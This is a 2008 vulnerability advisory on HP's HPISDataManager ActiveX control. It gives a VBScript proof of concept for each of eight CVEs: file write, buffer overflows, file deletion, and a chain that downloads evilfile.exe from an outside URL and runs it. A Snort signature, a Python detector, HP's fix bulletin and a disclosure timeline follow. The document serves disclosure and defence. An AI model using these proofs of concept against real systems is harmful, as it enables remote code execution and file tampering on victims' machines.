Credit:
The information has been provided by Dennis Rand.
The original article can be found at: http://www.csis.dk/dk/forside/CSIS-RI-0003.pdf
Vulnerable Systems:
* HPISDataManager.dll version 1.0.0.21
Hewlett-Packard Online Support Services is a suite of Web-based tools that automates troubleshooting and diagnosis of hardware and configuration issues. It automatically gathers system data and provides online solutions, including applicable BIOS and driver updates.
Download ActiveX URL:
http://h20278.www2.hp.com/HPISWeb/Customer/cabs/HPISDataManager.CAB
Support page from where the ActiveX is installed:
http://instantsupport.hp.com/euserv/jsp/hpinstantsupport.jsp
AppendStringToFile - Write file anywhere
The "AppendStringToFile" function in the ActiveX control allows a malicious attacker to write a file with arbitrary data anywhere on the system where the user has the appropriate system rights. This would allow complete compromise of the system and could be used in a drive-by scenario.
Proof of Concept:
<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:14C1B87C-3342-445F-9B5E-365FF330A3AC' id='target' />
<script language='vbscript'>
targetFile = "C:\WINDOWS\Downloaded Program Files\HPISDataManager.dll"
prototype = "Sub AppendStringToFile ( ByVal bstrInputFileName As String , ByVal bstrInputString As String )"
memberName = "AppendStringToFile"
progid = "HPISDataManagerLib.Datamgr"
argCount = 2
arg1="c:\evil.exe"
arg2="CSIS entered this"
target.AppendStringToFile arg1 ,arg2
</script></job></package>
CVE Information:
CVE-2008-0952
ExtractCab - Buffer Overflow
The "ExtractCab" function does not handle input correctly. This would allow a malicious attacker to insert a large amount of data into the function and overwrite the return address.
Successful exploitation of this vulnerability will allow execution of arbitrary code with the same rights as the logged on user. This issue could also lead to system compromise.
Proof of Concept:
<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:14C1B87C-3342-445F-9B5E-365FF330A3AC' id='target' />
<script language='vbscript'>
'for debugging/custom prolog
targetFile = "C:\WINDOWS\Downloaded Program Files\HPISDataManager.dll"
prototype = "Function ExtractCab ( ByVal filepath As String , ByVal destpath As String ) As String"
memberName = "ExtractCab"
progid = "HPISDataManagerLib.Datamgr"
argCount = 2
arg1=String(277, "B")
arg2="defaultV"
target.ExtractCab arg1 ,arg2
</script></job></package>
CVE Information:
CVE-2007-5604
GetFileTime - Buffer Overflow
The "GetFileTime" function does not correctly handle input. This will allow a malicious attacker to insert a large amount of data into the function and overwrite the return address.
Successful exploitation of this vulnerability will allow execution of arbitrary code with the same rights as the logged on user. Again this would allow complete system compromise.
Proof of Concept:
<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:14C1B87C-3342-445F-9B5E-365FF330A3AC' id='target' />
<script language='vbscript'>
'for debugging/custom prolog
targetFile = "C:\WINDOWS\Downloaded Program Files\HPISDataManager.dll"
prototype = "Function GetFileTime ( ByVal FileName As String ) As String"
memberName = "GetFileTime"
progid = "HPISDataManagerLib.Datamgr"
argCount = 1
arg1=String(1557, "B")
target.GetFileTime arg1
</script></job></package>
CVE Information:
CVE-2007-5605
MoveFile - Buffer Overflow
The "MoveFile" function does not handle input correctly. This would allow a malicious user to insert a large amount of data into the function and overwrite the return address.
Successful exploitation of this vulnerability will allow execution of arbitrary code with the rights of the logged on user. Yet again, exploitation could lead to complete system compromise.
Proof of Concept:
<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:14C1B87C-3342-445F-9B5E-365FF330A3AC' id='target' />
<script language='vbscript'>
'for debugging/custom prolog
targetFile = "C:\WINDOWS\Downloaded Program Files\HPISDataManager.dll"
prototype = "Sub MoveFile ( ByVal FileName As String )"
memberName = "MoveFile"
progid = "HPISDataManagerLib.Datamgr"
argCount = 1
arg1 = String(139, "B")
arg1 = "CCCC"
arg1 = arg1 + String(138, "B")
target.MoveFile arg1
</script></job></package>
CVE Information:
CVE-2007-5606
RegistryString - Buffer Overflow
The "RegistryString" function does not handle input correctly. This would allow a malicious attacker to insert a large amount of data into the function and overwrite the return address.
Successful exploitation of this vulnerability will allow execution of arbitrary code with the rights of the logged on user.
Proof of Concept:
<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:14C1B87C-3342-445F-9B5E-365FF330A3AC' id='target' />
<script language='vbscript'>
'for debugging/custom prolog
targetFile = "C:\WINDOWS\Downloaded Program Files\HPISDataManager.dll"
prototype = "Property Let RegistryString ( ByVal bstrRegistryKey As String , ByVal bUserKey As Long ) As String"
memberName = "RegistryString"
progid = "HPISDataManagerLib.Datamgr"
argCount = 3
arg1=String(2068, "B")
arg2=1
arg3="defaultV"
target.RegistryString(arg1 ,arg2 ) = arg3
</script></job></package>
CVE Information:
CVE-2007-5607
DownloadFile - Download arbitrary file
The "DownloadFile" function does not handle input correctly. This allows a malicious person to force the download of an arbitrary file onto the system where the ActiveX component is installed. In an attack scenario this could give an attacker access to sensitive client data.
Proof of Concept:
<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:14C1B87C-3342-445F-9B5E-365FF330A3AC' id='target' />
<script language='vbscript'>
'for debugging/custom prolog
targetFile = "C:\WINDOWS\Downloaded Program Files\HPISDataManager.dll"
prototype = "Sub DownloadFile ( ByVal bstrURL As String , ByVal bstrOutputFile As String , ByVal bstrErrorOutputFile As String )"
memberName = "DownloadFile"
progid = "HPISDataManagerLib.Datamgr"
argCount = 3
arg1="http://www.csis.dk/evilfile.exe"
arg2="c:\evilfile.exe"
arg3="c:\log.xml"
target.DownloadFile arg1 ,arg2 ,arg3
</script></job></package>
CVE Information:
CVE-2007-5608
StartApp - Execute arbitrary file on local system
The "StartApp" function does not handle input correctly, which would allow a malicious person to execute arbitrary code, e.g. the file downloaded with the "DownloadFile" functionality.
Proof of Concept:
<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:14C1B87C-3342-445F-9B5E-365FF330A3AC' id='target' />
<script language='vbscript'>
'for debugging/custom prolog
targetFile = "C:\WINDOWS\Downloaded Program Files\HPISDataManager.dll"
prototype = "Function StartApp ( ByVal appName As String ) As String"
memberName = "StartApp"
progid = "HPISDataManagerLib.Datamgr"
argCount = 1
arg1="c:\evilfile.exe"
target.StartApp arg1
</script></job></package>
CVE Information:
CVE-2008-0953
DeleteSingleFile - Delete arbitrary file on local system
The "DeleteSingleFile" function does not handle input correctly. A malicious attacker would be able to delete files on the system.
Proof of Concept:
<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:14C1B87C-3342-445F-9B5E-365FF330A3AC' id='target' />
<script language='vbscript'>
'for debugging/custom prolog
targetFile = "C:\WINDOWS\Downloaded Program Files\HPISDataManager.dll"
prototype = "Sub DeleteSingleFile ( ByVal pszFileName As String )"
memberName = "DeleteSingleFile"
progid = "HPISDataManagerLib.Datamgr"
argCount = 1
arg1="c:\evil.exe"
target.DeleteSingleFile arg1
</script></job></package>
CVE Information:
CVE-2007-5610
Workaround:
The following Snort signature can be used to detect use or active exploitation of the affected ActiveX component. It matches on the control's CLSID in traffic returned to the client.
alert tcp any any -> $HOME_NET any (msg:"CSIS Security Group - Research & Intelligence #0003"; flow:established,to_client; content:"clsid:14C1B87C-3342-445F-9B5E-365FF330A3AC"; nocase; reference:url,www.csis.dk; classtype:string-detect; sid:900000001; rev:1;)
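As an added example (not part of the CSIS advisory), the same CLSID match the Snort rule performs, applied in Python to a saved page, .wsf file or HTTP response body, and extended to report which of the eight vulnerable methods the content calls, using the CVE mapping listed above. The sample bodies are constructed for the example, not real captures.

```python
import re

# CLSID of the vulnerable HPISDataManager control, as listed in the advisory.
HPIS_CLSID = "14C1B87C-3342-445F-9B5E-365FF330A3AC"

# Vulnerable methods and the CVE the advisory assigns to each.
HPIS_METHODS = {
    "AppendStringToFile": "CVE-2008-0952",
    "ExtractCab": "CVE-2007-5604",
    "GetFileTime": "CVE-2007-5605",
    "MoveFile": "CVE-2007-5606",
    "RegistryString": "CVE-2007-5607",
    "DownloadFile": "CVE-2007-5608",
    "StartApp": "CVE-2008-0953",
    "DeleteSingleFile": "CVE-2007-5610",
}

# Same match as the Snort rule's content:"clsid:<CLSID>"; nocase, plus the
# braced form {CLSID} that some markup uses.
_CLSID_RE = re.compile(r"clsid:\{?" + re.escape(HPIS_CLSID) + r"\}?", re.IGNORECASE)


def scan_body(body: str) -> dict:
    """Inspect one HTTP response body, saved HTML page or .wsf file.

    A CLSID hit alone is what the Snort rule reports; the method names narrow
    it to the CVEs whose PoCs call them (case-insensitive, as VBScript is)."""
    if _CLSID_RE.search(body) is None:
        return {"clsid": False, "methods": {}}
    methods = {
        name: cve
        for name, cve in HPIS_METHODS.items()
        if re.search(r"\b" + name + r"\b", body, re.IGNORECASE)
    }
    return {"clsid": True, "methods": methods}


# Constructed sample bodies (not real captures): a page embedding an unrelated
# control, and one instantiating the HP control and calling two vulnerable methods.
BENIGN_BODY = (
    "<html><object classid='clsid:00000000-0000-0000-0000-000000000000'"
    " id='other'></object><script>other.Play</script></html>"
)
SUSPECT_BODY = (
    "<object classid='clsid:14c1b87c-3342-445f-9b5e-365ff330a3ac' id='target' />"
    "<script language='vbscript'>"
    "target.DownloadFile arg1, arg2, arg3 : target.StartApp arg2</script>"
)
```

`scan_body(SUSPECT_BODY)` returns `{"clsid": True, "methods": {"DownloadFile": "CVE-2007-5608", "StartApp": "CVE-2008-0953"}}`, while the benign page yields no hit.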
Fix:
HP has released the following:
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c01422264
Version: 1
HPSBMA02326 SSRT071490 rev.1 - HP Instant Support HPISDataManager.dll Running on Windows, Remote Execution of Arbitrary Code
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2008-06-02
Last Updated: 2008-06-02
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01422264
Timeline of public disclosure:
01. November 2007 Vulnerability discovered.
07. November 2007 Research ended.
10. November 2007 CERT/CC informed.
11. November 2007 Received CVE/VU tags from CERT/CC.
11. November 2007 Vendor notified (security-alert@hp.com).
13. March 2008 Vendor notified that a patch was almost ready.
10. April 2008 Requested update from vendor.
08. May 2008 Requested update from vendor.
08. May 2008 Received response from vendor that a patch was almost ready.
20. May 2008 Informed vendor that, if no response was received, the advisory would be made public on 22. May 2008.
21. May 2008 Received a request from the vendor asking whether the release date could be postponed to 26. May 2008.
04. June 2008 Public release.